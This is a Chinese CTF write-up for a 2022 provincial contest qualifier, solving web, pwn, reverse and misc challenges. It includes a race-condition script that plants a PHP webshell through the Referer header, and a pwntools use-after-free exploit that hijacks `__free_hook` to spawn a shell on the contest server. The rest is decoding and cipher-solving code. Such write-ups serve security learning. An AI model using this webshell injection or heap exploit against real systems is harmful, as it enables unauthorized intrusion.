第五届浙江省大学生网络与信息安全竞赛技能挑战赛(预赛)
date
Sep 17, 2022
slug
nisc2022-quals
status
Published
tags
CTF
WriteUP
summary
type
Post
- 名称:签个到我就跑Ⅱ
- 排名:5
Web
买买买01
条件竞争
import io
import sys
import threading
import requests
url = "http://1.14.97.218:26337"
def write(ses: requests.sessions):
while True:
header = {
"Referer": """<?php system($_GET['a']); ?>"""
}
ses.get(f"{url}/index.php?action=copy", headers=header)
def read(ses: requests.sessions):
while True:
aa = ses.get(f"{url}/78918a284cb4ebeb991381af708300a6/78918a284cb4ebeb991381af708300a6.txt2.php?a=cat /fla444444444444g")
# re
#
#
#
#
#
#
#
#
#
#
#
# <br />
# <b>Parse error</b>: syntax error, unexpected '' (T_ENCAPSED_AND_WHITESPACE), expecting '-' or identifier (T_STRING) or variable (T_VARIABLE) or number (T_NUM_STRING) in <b>/var/www/html/738ce8a315a6355fd00e2a736e9b847e/738ce8a315a6355fd00e2a736e9b847e.txt2.php</b> on line <b>1</b><br />sp = ses.get(f"{url}/53447bd885dcf4c8c53ebc86f91b2964/test.php?a=ls")
if aa.status_code == 200:
print(aa.text)
sys.exit()
# if resp.status_code == 200:
#
# print(resp.text)
# # sys.exit()
if __name__ == '__main__':
while True:
e = threading.Event()
s = requests.session()
header = {
"Referer": """<?php system($_GET['a']); ?>"""
}
aa = s.get(f"{url}/index.php?action=copy", headers=header)
print(aa.content)
for i in range(20):
threading.Thread(target=write, args=(s,)).start()
for i in range(20):
threading.Thread(target=read, args=(s,)).start()
e.set()
nisc_easyweb
扫目录出.DS_Store文件,010打开发现提示test_api,访问后f12有提示
test_api.php?i=FlagInHere 出flag
nisc_学校门户网站
账号:自己名字
密码:Nihao手机号前4位
吃豆人吃豆魂
f12 js包里找到base64的flag
PWN
babyheap
漏洞利用思路:利用delete方法的的UAF构造tcache头,将tcache头对应大小的count改大,释放tcache头获得libc地址,再uaf修改fd,从而劫持freehook,然后构建system(/bin/sh)拿shell
EXP
from pwn import *
context.log_level = 'debug'
context.arch='amd64'
io=remote("1.14.97.218",22080)
elf=ELF('./babyheap')
libc = ELF('./libc-2.27.so')
rl = lambda a=False : io.recvline(a)
ru = lambda a,b=True : io.recvuntil(a,b)
rn = lambda x : io.recvn(x)
sn = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda a,b : io.sendafter(a,b)
sla = lambda a,b : io.sendlineafter(a,b)
irt = lambda : io.interactive()
dbg = lambda text=None : gdb.attach(io, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))
def add(size):
io.recvuntil('input your choice:')
io.sendline('1')
io.recvuntil('input size:')
io.sendline(str(int(size)))
def edit(index, content):
io.recvuntil('input your choice:')
io.sendline('2')
io.recvuntil('input index:')
io.sendline(str(int(index)))
io.recvuntil('input content:')
io.send(content)
def show(idx):
io.recvuntil('input your choice:')
io.sendline('3')
io.recvuntil('input index:')
io.sendline(str(int(idx)))
def free(idx):
io.recvuntil('input your choice:')
io.sendline('4')
io.recvuntil('input index:')
io.sendline(str(int(idx)))
def exit():
io.recvuntil('input your choice:')
io.sendline('5')
add(0x70)
add(0x70)
free(0)
free(1)
show(1)
io.recvline()
heapbase=u64(io.recv(6).ljust(8,'\x00'))-0x260
lg("heapbase")
edit(1,p64(heapbase+0x10))
add(0x70)
add(0x70)
edit(3,p64(0)*2+'a'*0x40)
free(3)
show(3)
io.recvline()
libcbase=u64(io.recv(6).ljust(8,'\x00'))-(0x7f9bb93e8ca0-0x7f9bb8ffd000)
lg("libcbase")
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
free(1)
edit(1,p64(free_hook))
add(0x70)#4
add(0x70)#5
edit(5,p64(system))
edit(4,'/bin/sh\x00')
free(4)
#add(0x70)#6
#gdb.attach(io)
irt()RE
ManyCheck
patch or 直接抄答案
77
55
49
1198089844ezpy
pycdc dump
#include <iostream>
#include "defs.h"
#include <cstdint>
#include <cstdlib>
#include "aes/aes.h"
#include <stdio.h>
#include <stdint.h>
#define DELTA 0x4e253839
#define MX (((z>>6^y<<3) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e])))
void btea(uint32_t *v, int n, uint32_t const key[4])
{
uint32_t y, z, sum;
unsigned p, rounds, e;
if (n > 1) /* Coding Part */
{
rounds = 6 + 52/n;
sum = 0;
z = v[n-1];
do
{
sum += DELTA;
e = (sum >> 2) & 3;
for (p=0; p<n-1; p++)
{
y = v[p+1];
z = v[p] += MX;
}
y = v[0];
z = v[n-1] += MX;
}
while (--rounds);
}
else if (n < -1) /* Decoding Part */
{
n = -n;
rounds = 6 + 52/n;
sum = rounds*DELTA;
y = v[0];
do
{
e = (sum >> 2) & 3;
for (p=n-1; p>0; p--)
{
z = v[p-1];
y = v[p] -= MX;
}
z = v[n-1];
y = v[0] -= MX;
sum -= DELTA;
}
while (--rounds);
}
}
int main()
{
using namespace std;
uint32_t in[8] = {722695011, 893015348, 4216872997, 752171035, 1118151735, 2439687534, 3287721558, 2749371631};
uint32_t key[] = {4,3,2,1};
char aaa[32];
auto *in8 = (char*)in;
for (int i = 0; i < 4; ++i) {
btea(in+2*i, -2, key);
}
for (int i = 0; i < 8; ++i) {
printf("0x%08X, ", in[i]);
}
printf("\n");
printf("%s\n", in8);
return 0;
}
大小端转换
from utils.convert import DWORDList, Config, DWORD, DWORD2BYTEs, BYTEList, ROL
Config.print_type("hex")
a = [0x78787433, 0x3434345F, 0x316E5F70, 0x79746833, 0x6E5F3173, 0x5F653373, 0x795F7231, 0x6768743F]
ss = DWORDList(a)
a = []
for i in range(8):
a += DWORD2BYTEs((ss[i]))[::-1]
aaa = [DWORD(0x78), DWORD(0x78), DWORD(0x74), DWORD(0x33), DWORD(0x34), DWORD(0x34), DWORD(0x34), DWORD(0x5f), DWORD(0x31), DWORD(0x6e), DWORD(0x5f), DWORD(0x70), DWORD(0x79), DWORD(0x74), DWORD(0x68), DWORD(0x33), DWORD(0x6e), DWORD(0x5f), DWORD(0x31), DWORD(0x73), DWORD(0x5f), DWORD(0x65), DWORD(0x33), DWORD(0x73), DWORD(0x79), DWORD(0x5f), DWORD(0x72), DWORD(0x31), DWORD(0x67), DWORD(0x68), DWORD(0x74), DWORD(0x3f)]
aaa = [i for i in aaa]
print(BYTEList(a).toByteArray())
Crypto
None
MISC
好怪哦
压缩包反转
aa = open(r"D:\CTF\Reverse\zjctf2022\fuck.zip", "rb").read()
open(r"D:\CTF\Reverse\zjctf2022\fuck.fuck.zip", "wb").write(aa[::-1])添加PNG头
修改宽高
神奇的棋盘
看见dong.txt内有1-5的二位数字,逗号分割,hint提示棋盘,棋盘密码转换,转换为ADFGVX格式:
path = r'C:\Users\lifestyle\Desktop\MISC附件\file\dong.txt'
data = open(path, 'rb').read()
for i in data.split(b","):
if i ==b'11':
print('A',end='')
if i ==b'14':
print('D',end='')
if i == b'21':
print('F',end='')
if i == b'22':
print('G',end='')
if i== b'51':
print('V',end='')
if i == b'53':
print('X',end='')
table=[['P','H','O','Q','G','6'],
['4','M','E','A','1','Y'],
['L','2','N','O','F','D'],
['X','K','R','3','C','V'],
['S','5','Z','W','7','B'],
['J','9','U','T','I','8']
]AGAXXDAGGVGGVDVADAVXDGADVGDVAADDDDFXAFAFDGDVXXDGGDGGDXDDFDDXVGXADGVDFXVVAADDXDXXADDVGGGXGXXXXGXXGGXGDVVVGGGAGAAAAGAAGGAGDDDAGAGGGAGGAGAGAAAVAAAXGXGGGXGGXGXGXXXV
然后这个想要解密还要一个key,从图片里面提取到base64
base32解密后得到
然后adfgvx-cipher密码解密得到16进制
4441534354467b64383539633431633533306166633163316164393461626439326634626166387d
最后:16进制串转为字符串
import binascii
hexstring = "4441534354467b64383539633431633533306166633163316164393461626439326634626166387d"
print(binascii.unhexlify(hexstring).decode(encoding="utf-8"))